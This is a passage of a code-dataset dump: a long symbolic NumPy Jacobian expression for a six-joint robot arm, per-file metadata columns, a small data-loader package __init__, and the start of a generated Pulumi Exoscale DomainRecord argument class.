return np.array([[(0.3683*(((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + (-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + 0.3683*((-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[4, 0]))*s(q[5, 0]) + (0.3683*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.3683*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[5, 0]) + (0.01*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[4, 0]) + (0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (-0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) + 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) + 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]), (0.3683*(-(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 
0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.3683*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]))*s(q[5, 0]) + (-0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + (0.3683*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]) - 0.3683*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]))*c(q[5, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) - (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]), (0.3683*(-(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + 0.3683*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]))*s(q[5, 0]) + 0.3683*(-(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[3, 0])*c(q[5, 0]) + 0.01*(-(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + (-0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 
0]))*s(q[3, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]) - (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]), 0.3683*(-(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*s(q[5, 0])*c(q[4, 0]) + (-0.01*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[4, 0]) + (0.3683*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.3683*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[5, 0]) + (-0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), (-0.3683*((-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + 0.3683*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]))*s(q[5, 0]) - 
(0.01*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]), (0.3683*((-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + 0.3683*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[4, 0]))*c(q[5, 0]) - (0.3683*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.3683*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*s(q[5, 0]), 0], [(0.3683*(((-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + 0.3683*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[4, 0]))*s(q[5, 0]) + (0.3683*((-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.3683*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[5, 0]) + 
(0.01*((-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + (0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[4, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]), (0.3683*(-(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.3683*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]))*s(q[5, 0]) + (-0.3683*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) + 0.3683*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]))*c(q[5, 0]) + (-0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) - 
(-0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]), (0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[3, 0]) + 0.3683*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[3, 0])*c(q[5, 0]) + 0.01*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + (0.3683*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + 0.3683*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]))*s(q[5, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]) + (0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]) - (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]), 0.3683*(-(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*s(q[5, 0])*c(q[4, 0]) + (-0.01*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 
0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[4, 0]) + (0.3683*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.3683*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[5, 0]) + (-0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), (-0.3683*((-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + 0.3683*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]))*s(q[5, 0]) - (0.01*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]), (0.3683*((-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + 0.3683*((-0.707106781186548*s(q[0, 0]) - 
0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[4, 0]))*c(q[5, 0]) - (0.3683*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.3683*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*s(q[5, 0]), 0], [0, (0.3683*(s(q[1, 0])*c(q[2, 0])*c(q[3, 0]) + s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) - 0.3683*s(q[1, 0])*s(q[2, 0])*s(q[4, 0]))*s(q[5, 0]) + (0.3683*s(q[1, 0])*s(q[3, 0])*c(q[2, 0]) - 0.3683*c(q[1, 0])*c(q[3, 0]))*c(q[5, 0]) + (0.01*s(q[1, 0])*c(q[2, 0])*c(q[3, 0]) + 0.01*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) - 0.01*s(q[1, 0])*s(q[2, 0])*s(q[4, 0]) + 0.37429*s(q[1, 0])*s(q[3, 0])*c(q[2, 0]) + 0.069*s(q[1, 0])*c(q[2, 0]) - 0.37429*c(q[1, 0])*c(q[3, 0]) - 0.36435*c(q[1, 0]), (0.3683*s(q[2, 0])*c(q[1, 0])*c(q[3, 0])*c(q[4, 0]) + 0.3683*s(q[4, 0])*c(q[1, 0])*c(q[2, 0]))*s(q[5, 0]) + 0.3683*s(q[2, 0])*s(q[3, 0])*c(q[1, 0])*c(q[5, 0]) + 0.37429*s(q[2, 0])*s(q[3, 0])*c(q[1, 0]) + 0.01*s(q[2, 0])*c(q[1, 0])*c(q[3, 0])*c(q[4, 0]) + 0.069*s(q[2, 0])*c(q[1, 0]) + 0.01*s(q[4, 0])*c(q[1, 0])*c(q[2, 0]), (0.3683*s(q[1, 0])*s(q[3, 0]) - 0.3683*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[5, 0]) + (0.01*s(q[1, 0])*c(q[3, 0]) + 0.01*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]))*c(q[4, 0]) + 0.3683*(s(q[1, 0])*c(q[3, 0]) + s(q[3, 0])*c(q[1, 0])*c(q[2, 0]))*s(q[5, 0])*c(q[4, 0]) + 0.37429*s(q[1, 0])*s(q[3, 0]) - 0.37429*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]), (-0.3683*(s(q[1, 0])*s(q[3, 0]) - c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*s(q[4, 0]) + 0.3683*s(q[2, 0])*c(q[1, 0])*c(q[4, 0]))*s(q[5, 0]) - (0.01*s(q[1, 0])*s(q[3, 0]) - 0.01*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*s(q[4, 0]) + 0.01*s(q[2, 0])*c(q[1, 0])*c(q[4, 0]), (0.3683*(s(q[1, 0])*s(q[3, 0]) - c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.3683*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]))*c(q[5, 0]) - (-0.3683*s(q[1, 0])*c(q[3, 0]) - 
0.3683*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]))*s(q[5, 0]), 0]])
| 1,444.423077
| 16,008
| 0.539582
| 9,089
| 37,555
| 2.228408
| 0.004181
| 0.164609
| 0.107831
| 0.074652
| 0.994273
| 0.992199
| 0.991853
| 0.991607
| 0.990669
| 0.989187
| 0
| 0.485682
| 0.093356
| 37,555
| 25
| 16,009
| 1,502.2
| 0.109166
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 12
|
2c2b5b37d7b20d9361797e0102202f6f3ce2055d
| 307
|
py
|
Python
|
data/__init__.py
|
chilung/VisDA1
|
d5bafb7c6048f56483d2b03ae7040eee7a60af71
|
[
"MIT"
] | 60
|
2020-08-05T10:26:06.000Z
|
2022-01-13T12:46:06.000Z
|
data/__init__.py
|
chilung/VisDA1
|
d5bafb7c6048f56483d2b03ae7040eee7a60af71
|
[
"MIT"
] | 5
|
2020-08-06T04:55:17.000Z
|
2020-10-12T03:05:31.000Z
|
data/__init__.py
|
chilung/VisDA1
|
d5bafb7c6048f56483d2b03ae7040eee7a60af71
|
[
"MIT"
] | 10
|
2020-08-06T15:57:56.000Z
|
2021-02-02T08:42:21.000Z
|
# encoding: utf-8
"""
@author: sherlock
@contact: sherlockliao01@gmail.com
"""
from .build import make_val_data_loader, make_test_data_loader, make_camstyle_data_loader
from .build import make_camstyle_target_unsupdata_loader, make_camera_data_loader
from .build import make_camstyle_alltrain_data_loader
| 30.7
| 89
| 0.846906
| 44
| 307
| 5.454545
| 0.5
| 0.208333
| 0.1875
| 0.2375
| 0.308333
| 0.308333
| 0.308333
| 0
| 0
| 0
| 0
| 0.010676
| 0.084691
| 307
| 9
| 90
| 34.111111
| 0.843416
| 0.228013
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
25783d1cc1602101a0e45976ac3b544b7b833e11
| 19,100
|
py
|
Python
|
sdk/python/pulumi_exoscale/domain_record.py
|
secustor/pulumi-exoscale
|
c805e4bbf896526e46ed168bc96c9c0a3f82adf8
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_exoscale/domain_record.py
|
secustor/pulumi-exoscale
|
c805e4bbf896526e46ed168bc96c9c0a3f82adf8
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_exoscale/domain_record.py
|
secustor/pulumi-exoscale
|
c805e4bbf896526e46ed168bc96c9c0a3f82adf8
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['DomainRecordArgs', 'DomainRecord']
@pulumi.input_type
class DomainRecordArgs:
    def __init__(__self__, *,
                 content: pulumi.Input[str],
                 domain: pulumi.Input[str],
                 record_type: pulumi.Input[str],
                 name: Optional[pulumi.Input[str]] = None,
                 prio: Optional[pulumi.Input[int]] = None,
                 ttl: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing a DomainRecord resource.

        :param pulumi.Input[str] content: The value of the domain record.
        :param pulumi.Input[str] domain: The name of the [`Domain`][r-domain] to create the record into.
        :param pulumi.Input[str] record_type: The type of the domain record. Supported values are: `A`, `AAAA`, `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`, `SRV`, `SSHFP`, `TXT`, `URL`.
        :param pulumi.Input[str] name: The name of the domain record; leave blank (`""`) to create a root record (similar to using `@` in a DNS zone file).
        :param pulumi.Input[int] prio: The priority of the DNS domain record (for types that support it).
        :param pulumi.Input[int] ttl: The [Time To Live][ttl] of the domain record.
        """
        # The three required arguments are always recorded on the input type.
        pulumi.set(__self__, "content", content)
        pulumi.set(__self__, "domain", domain)
        pulumi.set(__self__, "record_type", record_type)
        # Optional arguments are recorded only when the caller actually supplied
        # them, so unset properties stay absent from the resource inputs.
        for prop_name, prop_value in (("name", name), ("prio", prio), ("ttl", ttl)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def content(self) -> pulumi.Input[str]:
        """The value of the domain record."""
        return pulumi.get(self, "content")

    @content.setter
    def content(self, value: pulumi.Input[str]):
        pulumi.set(self, "content", value)

    @property
    @pulumi.getter
    def domain(self) -> pulumi.Input[str]:
        """The name of the [`Domain`][r-domain] to create the record into."""
        return pulumi.get(self, "domain")

    @domain.setter
    def domain(self, value: pulumi.Input[str]):
        pulumi.set(self, "domain", value)

    @property
    @pulumi.getter(name="recordType")
    def record_type(self) -> pulumi.Input[str]:
        """
        The type of the domain record. Supported values are: `A`, `AAAA`,
        `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`,
        `SRV`, `SSHFP`, `TXT`, `URL`.
        """
        return pulumi.get(self, "record_type")

    @record_type.setter
    def record_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "record_type", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the domain record; leave blank (`""`) to create a root
        record (similar to using `@` in a DNS zone file).
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def prio(self) -> Optional[pulumi.Input[int]]:
